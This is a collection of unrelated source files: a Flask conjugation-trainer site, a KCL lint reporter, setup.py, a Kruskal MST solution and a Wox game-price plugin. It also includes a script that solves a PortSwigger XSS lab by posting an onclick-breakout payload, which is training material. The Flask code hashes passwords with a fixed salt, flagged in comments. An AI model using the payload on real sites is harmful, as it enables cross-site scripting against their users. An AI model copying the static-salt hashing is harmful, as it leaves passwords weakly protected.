        # 'bananeN' keys remember which tense checkboxes were ticked.
        session[f"banane{lang}"] = None
        for i in range(2, banana_count + 1):
            session[f"banane{i}{lang}"] = None
        # 'kiwiN' keys remember the selected verb-type radio button.
        session[f"kiwi{lang}"] = None
        session[f"kiwi2{lang}"] = None
        session[f"kiwi3{lang}"] = None
    if f"erreur_time{lang}" not in session:
        session[f"erreur_time{lang}"] = []
        session[f"erreur_pronouns{lang}"] = []
        session[f"erreur_verb{lang}"] = []
        session[f"erreur_type{lang}"] = []
    # Cap the mistake-replay queue: keep only the most recent mistake.
    if f"erreur_verb{lang}" in session and len(session[f"erreur_verb{lang}"]) >= 5:
        for key in ("erreur_time", "erreur_pronouns", "erreur_verb", "erreur_type"):
            session[f"{key}{lang}"] = [session[f"{key}{lang}"][-1]]
    if f"reponseUser{lang}" not in session:
        session[f"reponseUser{lang}"] = ""
    if f"reponseVerb{lang}" not in session:
        session[f"reponseVerb{lang}"] = ""


def before_request():
    """Initialise the Flask session keys used by every view.

    Refactored: the Spanish and Italian blocks were verbatim copies; both
    now go through _init_language_session (Spanish has 7 tense checkboxes,
    Italian 5).
    """
    if "username" not in session:
        session["username"] = "Connexion"
    _init_language_session("Spanish", banana_count=7)
    _init_language_session("Italian", banana_count=5)
# Home page
@app.route("/", methods=['GET', 'POST'])
def home():
    """Render the site's home page."""
    before_request()
    return render_template("home.html",
                           username=session["username"])
# German page
@app.route("/de", methods=['GET', 'POST'])
def de():
    """Render the site's German page."""
    before_request()
    return render_template("language/german.html",
                           username=session["username"])
# Italian page
@app.route("/it", methods=['GET', 'POST'])
def it():
    """Italian conjugation trainer page.

    Handles three kinds of POSTs on the same route:
    - tense checkboxes ("temps[]"): store the active tense list and redraw;
    - an answer ("reponse"): grade it against the expected conjugation,
      award points and queue mistakes for later replay;
    - "continue" / verb-type radio ("drone"): draw the next verb, replaying
      a queued mistake every third draw.
    """
    before_request()
    rappel = ""
    verif = request.form.get("temps[]")
    if verif in ("futur", "conditionnel", "présent", "imparfait", "passé simple"):
        session["listActiveTimesItalian"] = request.form.getlist("temps[]")
        session["timeItalian"] = random.choice(session["listActiveTimesItalian"])
        session["pronounsItalian"] = random.choice(listPronounsItalian)
        # Remember which tense checkboxes must stay ticked on re-render.
        bananes = {"futur": "bananeItalian", "conditionnel": "banane2Italian",
                   "présent": "banane3Italian", "imparfait": "banane4Italian",
                   "passé simple": "banane5Italian"}
        for time in bananes:
            session[bananes[time]] = "checked" if time in session["listActiveTimesItalian"] else None
    if request.form.get("reponse") is not None and session["verbItalian"] != "verbe":
        reponse = request.form.getlist("reponse")[0].lower()
        # Strip spaces from the submitted answer ('char' avoids shadowing
        # the chr() builtin).
        for char in reponse:
            if char != " ":
                session["reponseVerbItalian"] += char
        if "irregularItalian" in session and session["irregularItalian"] is True:
            # Irregular verbs: the full conjugated form comes from the table.
            correction = correspondanceTimeIrregularItalian[session["timeItalian"]]()[
                listPronounsItalian.index(session['pronounsItalian'])][
                correspondanceVerbItalian.index(session["verbItalian"])]
            if session["reponseVerbItalian"] == correction:
                session["reponseUserItalian"] = True
                models.addPoint(session["username"], 2)
            else:
                session["reponseUserItalian"] = str(correction)
                session["erreur_timeItalian"] += [session["timeItalian"]]
                session["erreur_verbItalian"] += [session["verbItalian"]]
                session["erreur_pronounsItalian"] += [session["pronounsItalian"]]
                session["erreur_typeItalian"] += [True]
                if "compteurItalian" not in session:
                    session["compteurItalian"] = 0
        else:
            # Regular verbs: stem + ending looked up by termination.
            termination = str(session["verbItalian"][-3:])
            if termination == "rre":
                correction = "c" + correspondanceTimeItalian[session["timeItalian"]]()[
                    listPronounsItalian.index(session['pronounsItalian'])][1]
            else:
                correction = correspondanceTimeItalian[session["timeItalian"]]()[
                    listPronounsItalian.index(session['pronounsItalian'])][
                    correspondanceTerminationItalian.index(termination)]
            # NOTE(review): verbItalian[-1] is the infinitive's last letter,
            # which is never "c" for -are/-ere/-ire infinitives; the "c"/"h"
            # branches below look like they meant the stem's last letter
            # (e.g. giocare -> giocherà) — confirm against the verb lists.
            if session["reponseVerbItalian"] == session["verbItalian"][:-3] + correction and session["verbItalian"][-1] != "c":
                session["reponseUserItalian"] = True
                models.addPoint(session["username"], 1)
            elif session["verbItalian"][-1] == "c" and session["reponseVerbItalian"] == session["verbItalian"][:-3] + "h" + correction:
                session["reponseUserItalian"] = str(session["verbItalian"][:-3] + "h" + correction)
                models.addPoint(session["username"], 1)
            elif session["verbItalian"][-1] == "c":
                session["reponseUserItalian"] = str(session["verbItalian"][:-3] + "h" + correction)
            else:
                session["reponseUserItalian"] = str(session["verbItalian"][:-3] + correction)
            # BUG FIX: this previously tested session["reponseUserSpanish"],
            # so Italian mistakes were recorded (or not) based on the last
            # Spanish answer.
            if session["reponseUserItalian"] is not True:
                session["erreur_timeItalian"] += [session["timeItalian"]]
                session["erreur_verbItalian"] += [session["verbItalian"]]
                session["erreur_pronounsItalian"] += [session["pronounsItalian"]]
                session["erreur_typeItalian"] += [False]
                if "compteurItalian" not in session:
                    session["compteurItalian"] = 0
    verb_type = request.form.get("drone")
    if request.form.get("continue") is not None or verb_type is not None:
        session["reponseUserItalian"] = ""
        session["reponseVerbItalian"] = ""
        if verb_type == "tous" or (
                verb_type != "reguliers" and verb_type != "irreguliers" and "tousItalian" in session and session[
                "tousItalian"] is True):
            # "tous": draw a regular or irregular verb at random.
            aleatoire = random.randint(0, 1)
            session["kiwi2Italian"] = "checked"
            session["kiwi3Italian"] = None
            session["kiwiItalian"] = None
            if aleatoire == 0:
                session["verbItalian"] = csvReaderIrregularItalian.verbChoice()
                session["irregularItalian"] = True
                session["tousItalian"] = True
            else:
                session["verbItalian"] = csvReaderItalian.verbChoice()
                session["tousItalian"] = True
                session["irregularItalian"] = False
        elif verb_type == "irreguliers" or (
                verb_type != "reguliers" and "irregularItalian" in session and session["irregularItalian"] is True):
            session["kiwi3Italian"] = "checked"
            session["kiwiItalian"] = None
            session["kiwi2Italian"] = None
            session["verbItalian"] = csvReaderIrregularItalian.verbChoice()
            session["irregularItalian"] = True
            session["tousItalian"] = False
        else:
            session["kiwiItalian"] = "checked"
            session["kiwi2Italian"] = None
            session["kiwi3Italian"] = None
            session["verbItalian"] = csvReaderItalian.verbChoice()
            session["tousItalian"] = False
            session["irregularItalian"] = False
        if "compteurItalian" in session and session["compteurItalian"] == 2:
            # Third draw after a mistake: replay the oldest queued error.
            session["timeItalian"] = session["erreur_timeItalian"][0]
            session["pronounsItalian"] = session["erreur_pronounsItalian"][0]
            session["verbItalian"] = session["erreur_verbItalian"][0]
            session["irregularItalian"] = session["erreur_typeItalian"][0]
            session["erreur_timeItalian"].pop(0)
            session["erreur_pronounsItalian"].pop(0)
            session["erreur_verbItalian"].pop(0)
            session["erreur_typeItalian"].pop(0)
            session.pop("compteurItalian")
            rappel = "Tu as fait une erreur récemment sur ce verbe, conjugue le à nouveau !"
        else:
            session["timeItalian"] = random.choice(session["listActiveTimesItalian"])
            session["pronounsItalian"] = random.choice(listPronounsItalian)
            if "compteurItalian" in session:
                session["compteurItalian"] += 1
    return render_template("language/italian.html",
                           time=session["timeItalian"],
                           pronouns=session["pronounsItalian"],
                           verb=session["verbItalian"],
                           reponseUser=session["reponseUserItalian"],
                           reponseVerb=session["reponseVerbItalian"],
                           banane=session["bananeItalian"],
                           banane2=session["banane2Italian"],
                           banane3=session["banane3Italian"],
                           banane4=session["banane4Italian"],
                           banane5=session["banane5Italian"],
                           kiwi=session["kiwiItalian"],
                           kiwi2=session["kiwi2Italian"],
                           kiwi3=session["kiwi3Italian"],
                           username=session["username"],
                           rappel=rappel)
# Spanish page
@app.route("/es", methods=['GET', 'POST'])
def es():
    """Spanish conjugation trainer page.

    Handles three kinds of POSTs on the same route:
    - tense checkboxes ("temps[]"): store the active tense list and redraw;
    - an answer ("reponse"): grade it against the expected conjugation,
      award points and queue mistakes for later replay;
    - "continue" / verb-type radio ("drone"): draw the next verb (regular,
      irregular or either), replaying a queued mistake every third draw.
    """
    before_request()
    rappel = ""
    verif = request.form.get("temps[]")
    if verif == "Futuro" or verif == "Conditional" or verif == "Presente de indicativo" or verif == "Presente de subjonctivo" or verif == "Pretérito imperfecto de indicativo" or verif == "Pretérito indefinido" or verif == "Prétero imperfecto de subjonctivo":
        session["listActiveTimesSpanish"] = request.form.getlist("temps[]")
        session["timeSpanish"] = random.choice(session["listActiveTimesSpanish"])
        session["pronounsSpanish"] = random.choice(listPronounsSpanish)
        # Remember which tense checkboxes must stay ticked on re-render.
        bananes = {"Futuro": "bananeSpanish", "Conditional": "banane2Spanish", "Presente de indicativo": "banane3Spanish",
                   "Presente de subjonctivo": "banane4Spanish", "Pretérito imperfecto de indicativo": "banane5Spanish",
                   "Pretérito indefinido": "banane6Spanish", "Prétero imperfecto de subjonctivo": "banane7Spanish"}
        for time in bananes:
            if time in session["listActiveTimesSpanish"]:
                session[bananes[time]] = "checked"
            else:
                session[bananes[time]] = None
    if request.form.get("reponse") is not None and session["verbSpanish"] != "verbe":
        if request.form.get("reponse") is not None:
            reponse = request.form.getlist("reponse")
            reponse = reponse[0].lower()
        else:
            reponse = ""
        # Strip spaces from the submitted answer.
        for chr in reponse:
            if chr != " ":
                session["reponseVerbSpanish"] += chr
        if "irregularSpanish" in session and session["irregularSpanish"] is True:
            # Irregular verbs: the full conjugated form comes from the table.
            correction = correspondanceTimeIrregularSpanish[session["timeSpanish"]]()[listPronounsSpanish.index(session['pronounsSpanish'])][
                correspondanceVerbSpanish.index(session["verbSpanish"])]
            if session["reponseVerbSpanish"] == correction:
                session["reponseUserSpanish"] = True
                models.addPoint(session["username"], 2)
            else:
                session["reponseUserSpanish"] = str(correction)
                session["erreur_timeSpanish"] += [session["timeSpanish"]]
                session["erreur_verbSpanish"] += [session["verbSpanish"]]
                session["erreur_pronounsSpanish"] += [session["pronounsSpanish"]]
                session["erreur_typeSpanish"] += [True]
                if not ("compteurSpanish" in session):
                    session["compteurSpanish"] = 0
        else:
            # Regular verbs: futuro/conditional endings attach to the whole
            # infinitive, every other tense to the stem (infinitive minus 2).
            termination = str(session["verbSpanish"][-2:])
            correction = correspondanceTimeSpanish[session["timeSpanish"]]()[listPronounsSpanish.index(session['pronounsSpanish'])][
                correspondanceTerminationSpanish.index(termination)]
            if (session["reponseVerbSpanish"] == session["verbSpanish"][:-2] + correction and session["timeSpanish"] != "Futuro" and session[
                "timeSpanish"] != "Conditional") or (
                    (session["timeSpanish"] == "Futuro" or session["timeSpanish"] == "Conditional") and session["reponseVerbSpanish"] ==
                    session[
                        "verbSpanish"] + correction):
                session["reponseUserSpanish"] = True
                models.addPoint(session["username"], 1)
            elif (session["timeSpanish"] == "Futuro" or session["timeSpanish"] == "Conditional") and session["reponseVerbSpanish"] != \
                    session[
                        "verbSpanish"] + correction:
                session["reponseUserSpanish"] = str(session["verbSpanish"] + correction)
            else:
                session["reponseUserSpanish"] = str(session["verbSpanish"][:-2] + correction)
            # Record the mistake for the replay queue when the answer was wrong.
            if session["reponseUserSpanish"] is not True:
                session["erreur_timeSpanish"] += [session["timeSpanish"]]
                session["erreur_verbSpanish"] += [session["verbSpanish"]]
                session["erreur_pronounsSpanish"] += [session["pronounsSpanish"]]
                session["erreur_typeSpanish"] += [False]
                if not ("compteurSpanish" in session):
                    session["compteurSpanish"] = 0
    verb_type = request.form.get("drone")
    if request.form.get("continue") is not None or verb_type is not None:
        session["reponseUserSpanish"] = ""
        session["reponseVerbSpanish"] = ""
        if verb_type == "tous" or (
                verb_type != "reguliers" and verb_type != "irreguliers" and "tousSpanish" in session and session[
            "tousSpanish"] is True):
            # "tous": draw a regular or irregular verb at random.
            aleatoire = random.randint(0, 1)
            session["kiwi2Spanish"] = "checked"
            session["kiwi3Spanish"] = None
            session["kiwiSpanish"] = None
            if aleatoire == 0:
                session["verbSpanish"] = csvReaderIrregularSpanish.verbChoice()
                session["irregularSpanish"] = True
                session["tousSpanish"] = True
            else:
                session["verbSpanish"] = csvReaderSpanish.verbChoice()
                session["tousSpanish"] = True
                session["irregularSpanish"] = False
        elif verb_type == "irreguliers" or (
                verb_type != "reguliers" and "irregularSpanish" in session and session["irregularSpanish"] is True):
            session["kiwi3Spanish"] = "checked"
            session["kiwiSpanish"] = None
            session["kiwi2Spanish"] = None
            session["verbSpanish"] = csvReaderIrregularSpanish.verbChoice()
            session["irregularSpanish"] = True
            session["tousSpanish"] = False
        else:
            session["kiwiSpanish"] = "checked"
            session["kiwi2Spanish"] = None
            session["kiwi3Spanish"] = None
            session["verbSpanish"] = csvReaderSpanish.verbChoice()
            session["tousSpanish"] = False
            session["irregularSpanish"] = False
        if "compteurSpanish" in session and session["compteurSpanish"] == 2:
            # Third draw after a mistake: replay the oldest queued error.
            session["timeSpanish"] = session["erreur_timeSpanish"][0]
            session["pronounsSpanish"] = session["erreur_pronounsSpanish"][0]
            session["verbSpanish"] = session["erreur_verbSpanish"][0]
            session["irregularSpanish"] = session["erreur_typeSpanish"][0]
            session["erreur_timeSpanish"].pop(0)
            session["erreur_pronounsSpanish"].pop(0)
            session["erreur_verbSpanish"].pop(0)
            session["erreur_typeSpanish"].pop(0)
            session.pop("compteurSpanish")
            rappel = "Tu as fait une erreur récemment sur ce verbe, conjugue le à nouveau !"
        else:
            session["timeSpanish"] = random.choice(session["listActiveTimesSpanish"])
            session["pronounsSpanish"] = random.choice(listPronounsSpanish)
            if "compteurSpanish" in session:
                session["compteurSpanish"] += 1
    return render_template("language/spanish.html",
                           time=session["timeSpanish"],
                           pronouns=session["pronounsSpanish"],
                           verb=session["verbSpanish"],
                           reponseUser=session["reponseUserSpanish"],
                           reponseVerb=session["reponseVerbSpanish"],
                           banane=session["bananeSpanish"],
                           banane2=session["banane2Spanish"],
                           banane3=session["banane3Spanish"],
                           banane4=session["banane4Spanish"],
                           banane5=session["banane5Spanish"],
                           banane6=session["banane6Spanish"],
                           banane7=session["banane7Spanish"],
                           kiwi=session["kiwiSpanish"],
                           kiwi2=session["kiwi2Spanish"],
                           kiwi3=session["kiwi3Spanish"],
                           username=session["username"],
                           rappel=rappel)
@app.route("/connexion", methods=['GET', 'POST'])
def connexion():
    """Render the login / account-creation page."""
    before_request()
    return render_template("login.html",
                           username=session["username"])
@app.route("/signup", methods=['GET', 'POST'])
def signup():
    """Handle account creation: reject duplicate e-mails/usernames, send a
    verification mail, store the new user and log them in."""
    before_request()
    user = models.User.query.all()
    email = request.form.get("email")
    usernameBase = request.form.get("username").lower()
    username = ""
    # Keep only [a-z0-9._-] characters from the requested username.
    for chr in usernameBase:
        if chr != " " and (
                ord(chr) == 45 or ord(chr) == 46 or 48 <= ord(chr) <= 57 or ord(chr) == 95 or 97 <= ord(chr) <= 122):
            username += chr
    for val in user:
        if email == val.email:
            flash("Adresse email déjà utilisé")
            return redirect(url_for("connexion"))
        if username == val.username:
            flash("Nom d'utilisateur déjà utilisé")
            return redirect(url_for("connexion"))
    firstname = request.form.get("firstname")
    lastname = request.form.get("lastname")
    mailtoken = secrets.token_hex(12)
    mail(email,"mailverif.html", firstname, lastname, username, mailtoken)
    # SECURITY(review): a fixed salt 'abcd' defeats per-user salting — every
    # identical password hashes identically; consider per-user random salts.
    password = hashing.hash_value(request.form.get("password"), salt='abcd')
    etablissement = request.form.get("etablissement")
    date_creation = models.datetime.now().strftime('%d/%m/%Y')
    logo = "https://cdn.discordapp.com/attachments/1098726716798673016/1099109424590757929/mexicain.png"
    # NOTE(review): long positional list — confirm field order against models.addUser.
    models.addUser(email, False, mailtoken, firstname, lastname, username, password, etablissement, 0, "0", date_creation, logo, 1, 0, 0, 0)
    session["username"] = username
    flash("Bienvenue et bonne conjugaison")
    if "qcm" in session:
        return redirect("qcm")
    return redirect(url_for("home"))
@app.route("/signin", methods=['GET', 'POST'])
def signin():
    """Handle login: on e-mail + password match redirect home, otherwise
    flash the reason and return to the login page.

    NOTE(review): distinct messages for "wrong password" and "unknown
    e-mail" allow account enumeration.
    """
    before_request()
    user = models.User.query.all()
    for val in user:
        if request.form.get("email") == val.email and hashing.check_value(val.password, request.form.get("password"),
                                                                          salt='abcd'):
            flash("Connexion réussi")
            session["username"] = val.username
            if "qcm" in session:
                return redirect("qcm")
            return redirect(url_for("home"))
        elif request.form.get("email") == val.email:
            flash("Mot de passe incorrect")
            return redirect(url_for("connexion"))
    flash("Pas de compte utilisateur pour cette adresse email")
    return redirect(url_for("connexion"))
@app.route("/logout", methods=['GET', 'POST'])
def logout():
    """Log the current user out by resetting the session username."""
    before_request()
    session["username"] = "Connexion"
    flash("Déconnection réussi")
    return redirect(url_for("home"))
@app.route("/profile/<username>", methods=['GET', 'POST'])
def username_route(username):
    """Render the profile page of the user named *username*.

    Returns the plain string "User Not Found" when no user matches.
    """
    before_request()
    models.modifyClassement(classements())
    user = models.User.query.all()
    # Linear scan over every user; a filtered query would avoid this.
    for val in user:
        if val.username == username:
            date_creation = val.date_creation
            xp = val.xp
            etablissement = val.etablissement
            level = val.level
            day_streak = val.day_streak
            logo = val.logo
            classement = val.classement
            return render_template("heritage_template/profile.html",
                                   date_creation=date_creation,
                                   xp=xp,
                                   etablissement=etablissement,
                                   day_streak=day_streak,
                                   logo=logo,
                                   username2=username,
                                   level=level,
                                   classement=classement,
                                   classementJoueurs=classements(),
                                   username=session["username"])
    return "User Not Found"
@app.route("/share", methods=['GET', 'POST'])
def partager():
    """'Share profile' action: confirm the link copy and go back to the
    current user's profile page (the copy itself happens client-side)."""
    flash("Le lien du profil a bien été copié")
    return redirect(url_for("username_route", username=session["username"]))
@app.route("/search", methods=['GET', 'POST'])
def search():
    """Render the user-search page."""
    before_request()
    return render_template("search.html", username=session["username"], utilisateurs=utilisateurs())
@app.route("/leaderboard", methods=['GET', 'POST'])
def leaderboard():
    """Render the leaderboard page (all-time, weekly and monthly rankings)."""
    before_request()
    return render_template("leaderboard.html",
                           username=session["username"],
                           utilisateurs=utilisateurs(),
                           classementPlayers=classements(),
                           classementWeek=classement_week(),
                           classementMonth=classement_month())
@app.route("/verif/<username>/<mailtoken>", methods=['GET', 'POST'])
def verif(mailtoken, username):
    """E-mail verification landing page: confirm the token, then go home."""
    if models.verif(mailtoken, username) is True:
        flash("Compte vérifier")
        return redirect(url_for("home"))
    flash("une erreur est survenu")
    return redirect(url_for("home"))
@app.route("/forgetpassword/<username>/<mailtoken>", methods=['GET', 'POST'])
def passwordForget(username, mailtoken):
    """Password-reset landing page.

    On POST, hash the new password (same static-salt scheme as signup) and
    store it if the token matches; on GET, show the reset form.
    """
    password = request.form.get("password")
    if password is not None:
        password = hashing.hash_value(password, salt='abcd')
        if models.changePassword(mailtoken, username, password) is True:
            flash("Changement de mot de passe effectué")
            return redirect(url_for("home"))
        flash("une erreur est survenu")
        return redirect(url_for("home"))
    return render_template("forgetPassword.html")
@app.route("/forgetpassword", methods=['GET', 'POST'])
def sendMailPassword():
    """Send a password-reset e-mail to the logged-in user, then redirect home."""
    username = session["username"]
    mailtoken = secrets.token_hex(12)
    first_last_name = addtoken(mailtoken, username)
    firstname = first_last_name[0]
    lastname = first_last_name[1]
    # Renamed from 'mail': the old local shadowed the mail() helper used by signup().
    email = first_last_name[2]
    sendmail(email, "mailforgetpassword.html", firstname, lastname, username, mailtoken)
    # BUG FIX: this view previously returned None, which makes Flask raise a
    # "view did not return a valid response" error after sending the mail.
    flash("Un email de réinitialisation a été envoyé")
    return redirect(url_for("home"))
#@app.route("/qcm", methods=['GET', 'POST'])
#def qcm():
# """fonction permettant d'accéder à la page QCM """
# before_request()
# session["qcm"] = "ok"
# return render_template("qcm.html",
# username=session["username"])
#@app.route("/esQcmChap4", methods=['GET', 'POST'])
#def esQcmChap4():
# before_request()
# if session["username"] == "Connexion":
# return redirect(url_for("qcm"))
# else:
# return render_template("esQcmChap4.html",
# username=session["username"])
| Tezay/conjug | conjugFR/views.py | views.py | py | 27,625 | python | en | code | 6 | github-code | 36 |
1938554685 | import sys
from typing import List
from kclvm.tools.lint.reporters.base_reporter import BaseReporter
from kclvm.tools.lint.message.message import Message
class FileReporter(BaseReporter):
    """Reporter that writes KCL lint results to ``linter.config.output_path``."""

    def __init__(self, linter, output=None, encoding=None):
        self.name = "file_reporter"
        self.output_file = linter.config.output_path
        super().__init__(linter, output, encoding)

    def print_msg(self, msgs: List[Message] = None):
        """Write each message plus a per-code summary to the output file.

        Bug fix: the original rebound ``sys.stdout`` to the file and only
        restored it on the success path, so an exception while printing
        left the whole process pointed at a closed file. Printing with
        ``file=`` needs no global state at all.
        """
        assert self.output_file
        with open(self.output_file, "w") as f:
            for msg in msgs:
                print(msg, file=f)
            print(file=f)
            print("Check total {} files:".format(len(self.linter.file_list)), file=f)
            # Summary: count, message code, and its short description.
            for k, v in self.linter.msgs_map.items():
                print("{:<8}{}: {}".format(v, k, self.linter.MSGS[k][1]), file=f)
            print(f"KCL Lint: {len(self.linter.msgs)} problems", file=f)
| kcl-lang/kcl-py | kclvm/tools/lint/reporters/file_reporter.py | file_reporter.py | py | 968 | python | en | code | 8 | github-code | 36 |
264212609 | """
https://portswigger.net/web-security/cross-site-scripting/contexts/lab-onclick-event-angle-brackets-double-quotes-html-encoded-single-quotes-backslash-escaped
"""
import sys
import requests
from bs4 import BeautifulSoup
# Normalize the target passed on the command line to a bare hostname.
site = sys.argv[1]
if 'https://' in site:
    # Bug fix: str.lstrip strips a *character set*, not a prefix —
    # "https://pdx.edu/".rstrip('/').lstrip('https://') yields "dx.edu"
    # because the leading "p" of "pdx" is in the set {h,t,p,s,:,/}.
    # Remove the scheme as a prefix instead.
    site = site.rstrip('/')
    if site.startswith('https://'):
        site = site[len('https://'):]
s = requests.Session()
def try_post(name, website_link):
    """Post a blog comment with `website_link` as the website field.

    Fetches post #1 first to scrape the CSRF token from the comment form,
    then submits the comment using the same session (keeps the lab cookie).
    The `website` value is the XSS probe under test.
    """
    blog_post_url = f'https://{site}/post?postId=1'
    resp = s.get(blog_post_url)
    soup = BeautifulSoup(resp.text,'html.parser')
    # The comment form embeds a per-session CSRF token in a hidden input.
    csrf = soup.find('input', {'name':'csrf'}).get('value')
    comment_url = f'https://{site}/post/comment'
    comment_data = {
        'csrf' : csrf,
        'postId' : '1',
        'comment' : 'Hello world!',
        'name' : name,
        'email' : 'baa@pdx.edu',
        'website': website_link
    }
    resp = s.post(comment_url, data=comment_data)
#try_post("single quote","https://pdx.edu/'")
#try_post("double quote",'https://pdx.edu/"')
#try_post("double quote HTML encoded",'https://pdx.edu/"')
#try_post("single quote HTML encoded",'https://pdx.edu/'')
# Bug fix: the payload was written as the unquoted expression
# 'https://pdx.edu/' -alert(1)-'' (a NameError at runtime). The intended
# onclick-breakout payload is the single string below.
try_post("exploit", "https://pdx.edu/'-alert(1)-'")
71205780264 | from setuptools import setup, find_packages
from apache_spark import __version__
# Development/test-only dependencies; not installed with the package,
# exposed below through extras_require["tests"].
tests_require = [
    'mock',
    'nose',
    'coverage',
    'yanc',
    'preggy',
    'tox',
    'ipdb',
    'coveralls',
    'sphinx',
]
# Package metadata and build configuration for setuptools.
setup(
    name='apache_spark',
    version=__version__,
    description='Computational tools for Big Data (02807) - Apache Spark',
    long_description='''
Computational tools for Big Data (02807) - Apache Spark
''',
    keywords='spark pyspark euler graphs',
    author='Jose L. Bellod Cisneros & Kosai Al-Nakeeb',
    author_email='bellod.cisneros@gmail.com & kosai@cbs.dtu.dk',
    url='https://github.com/josl/ApacheSpark_02817',
    license='MIT',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: English',
        'Operating System :: Unix',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: Implementation :: PyPy',
        'Operating System :: OS Independent',
    ],
    packages=find_packages(),
    include_package_data=False,
    # Runtime requirements are intentionally empty for now.
    install_requires=[
        # add your dependencies here
        # remember to use 'package-name>=x.y.z,<x.y+1.0' notation (this way you
        # get bugfixes)
    ],
    extras_require={
        'tests': tests_require,
    },
    entry_points={
        'console_scripts': [
            # add cli scripts here in this form:
            # 'apache_spark=apache_spark.cli:main',
        ],
    },
)
| yosoyubik/ApacheSpark_02817 | setup.py | setup.py | py | 1,598 | python | en | code | 0 | github-code | 36 |
# Find the root of the set containing a given element (union-find).
def find_parent(parent, x):
    """Return the root of x's set, compressing the path along the way.

    Cleanup: the original duplicated `return parent[x]` inside the `if`
    branch; both branches returned the same expression, so a single
    return after optional path compression is equivalent.
    """
    if parent[x] != x:
        parent[x] = find_parent(parent, parent[x])
    return parent[x]
def union_parent(parent, a, b):
    """Merge the sets containing a and b; the smaller root becomes parent."""
    root_a = find_parent(parent, a)
    root_b = find_parent(parent, b)
    if root_a < root_b:
        parent[root_b] = root_a
    else:
        parent[root_a] = root_b
if __name__ == "__main__":
    n = int(input())
    parent = [0] * (n + 1)  # initialize the parent table
    # List to hold every candidate edge and the final total cost
    edges = []
    result = 0
    x = []
    y = []
    z = []
    # In the parent table, every node starts as its own parent
    for i in range(1, n + 1):
        parent[i] = i
    # Read the coordinates of every node
    for i in range(1, n + 1):
        data = list(map(int, input().split()))
        x.append((data[0], i))  # keep only the x coordinate; i is the node id
        y.append((data[1], i))  # keep only the y coordinate
        z.append((data[2], i))  # keep only the z coordinate
    # Sort each axis in ascending order
    x.sort()
    y.sort()
    z.sort()
    for i in range(n - 1):
        # Put the cost first so sorting orders edges by cost; only adjacent
        # nodes on each sorted axis can form a minimal tunnel
        edges.append((x[i + 1][0] - x[i][0], x[i][1], x[i + 1][1]))
        edges.append((y[i + 1][0] - y[i][0], y[i][1], y[i + 1][1]))
        edges.append((z[i + 1][0] - z[i][0], z[i][1], z[i + 1][1]))
    # Kruskal's algorithm: take cheapest edges that join distinct sets
    edges.sort()
    for edge in edges:
        cost, a, b = edge
        if find_parent(parent, a) != find_parent(parent, b):
            union_parent(parent, a, b)
            result += cost
    print(result)
| vmfaldwntjd/Algorithm | BaekjoonAlgorithm/파이썬/그래프/[백준 2887]행성 터널/Baekjoon_2887.py | Baekjoon_2887.py | py | 1,709 | python | ko | code | 0 | github-code | 36 |
18262811618 | import requests
import json
import os
import pyperclip
from wox import Wox,WoxAPI
class Main(Wox):
    """Wox launcher plugin that queries FFXIV market-board prices.

    Two sub-commands are parsed from the query string:
    's <name>' searches items via the cafemaker (XIVAPI mirror) API;
    'q <itemID> <serverNo>' lists current sale listings via universalis.
    """
    def query(self,key):
        """Dispatch on the first token of the query and build Wox results."""
        results=[]
        key=key.split(' ')
        # Data-center aliases selectable as '1'/'2'/'3' in a 'q' query.
        servers={
            '1':"LuXingNiao",'2':"MoGuLi",'3':"MaoXiaoPang",
        }
        # Romanized world name -> display name used in listing subtitles.
        worlds={
            'HongYuHai':"红玉海",
            'LaNuoXiYa':"拉诺西亚",
            'ChenXiWangZuo':"晨曦王座",
            'YuZhouHeYin':"宇宙和音",
            'WoXianXiRan':"沃仙曦染",
            'ShenYiZhiDi':"神意之地",
            'HuanYingQunDao':"幻影群岛",
            'MengYaChi':"萌芽池",
            'BaiYinXiang':"白银乡",
            'BaiJinHuanXiang':"白金幻象",
            'ShenQuanHen':"神拳痕",
            'ChaoFengTing':"潮风亭",
            'LvRenZhanQiao':"旅人栈桥",
            'FuXiaoZhiJian':"拂晓之间",
            'Longchaoshendian':"龙巢神殿",
            'MengYuBaoJing':"梦羽宝境",
            'ZiShuiZhanQiao':"紫水栈桥",
            'YanXia':"延夏",
            'JingYuZhuangYuan':"静语庄园",
            'MoDuNa':"摩杜纳",
            'HaiMaoChaWu':"海猫茶屋",
            'RouFengHaiWan':"柔风海湾",
            'HuPoYuan':"琥珀原"
        }
        if key[0]=='s':
            recvListings=self.cafemaker(key[1])
            for item in recvListings:
                itemID,itemType,itemIconPath,itemKindName,itemName=self.itemSolve(item)
                if itemType=="Item":
                    itemIconUrl='https://cafemaker.wakingsands.com/{}'.format(itemIconPath)
                    # Cache item icons locally so they are downloaded once.
                    if not os.path.exists('ItemIcon/{}.png'.format(itemID)):
                        with open('ItemIcon/{}.png'.format(itemID),'wb') as f:
                            f.write(requests.get(itemIconUrl).content)
                    results.append({
                        "Title":"{}".format(itemName),
                        "SubTitle":"{}".format(itemKindName),
                        "IcoPath":"ItemIcon/{}.png".format(itemID),
                        # Selecting a search hit rewrites the query into a
                        # price lookup for that item.
                        "JsonRPCAction":{
                            "method":"Wox.ChangeQuery",
                            "parameters":["item q {} 1 ({})".format(itemID,itemName),False],
                            "dontHideAfterAction":True
                        }
                    })
            return results
        if key[0]=='q':
            data=self.universalis(servers[key[2]],key[1])
            for item in data:
                results.append({
                    "Title": "{} x {} = {}".format(item["pricePerUnit"],item["quantity"],item["total"]),
                    "SubTitle": "{}({})".format(item["retainerName"],worlds[item["worldName"]]),
                    "IcoPath":"Images/hq.png"if item["hq"] else "Images/nq.png"
                })
            return results
    def universalis(self,server,itemID):
        """Fetch current market listings; returns False when the item is unknown."""
        api='https://universalis.app/api/{}/{}'.format(server,itemID)
        recv=requests.get(api)
        if recv.text=='Not Found':
            return False
        return json.loads(recv.text)["listings"]
    def cafemaker(self,queryName):
        """Search items by name, restricted to the columns itemSolve unpacks."""
        u='https://cafemaker.wakingsands.com/search?columns=ID%2CUrlType%2CIcon%2CName%2CItemKind.Name&string={}'.format(queryName)
        return json.loads(requests.get(u).text)["Results"]
    def itemSolve(self,item):
        """Unpack one search result into (id, type, icon path, kind name, name)."""
        return item["ID"],item["UrlType"],item["Icon"],item["ItemKind"]["Name"],item["Name"]
# Instantiating the Wox subclass starts the plugin's JSON-RPC loop.
if __name__ == "__main__":
    Main()
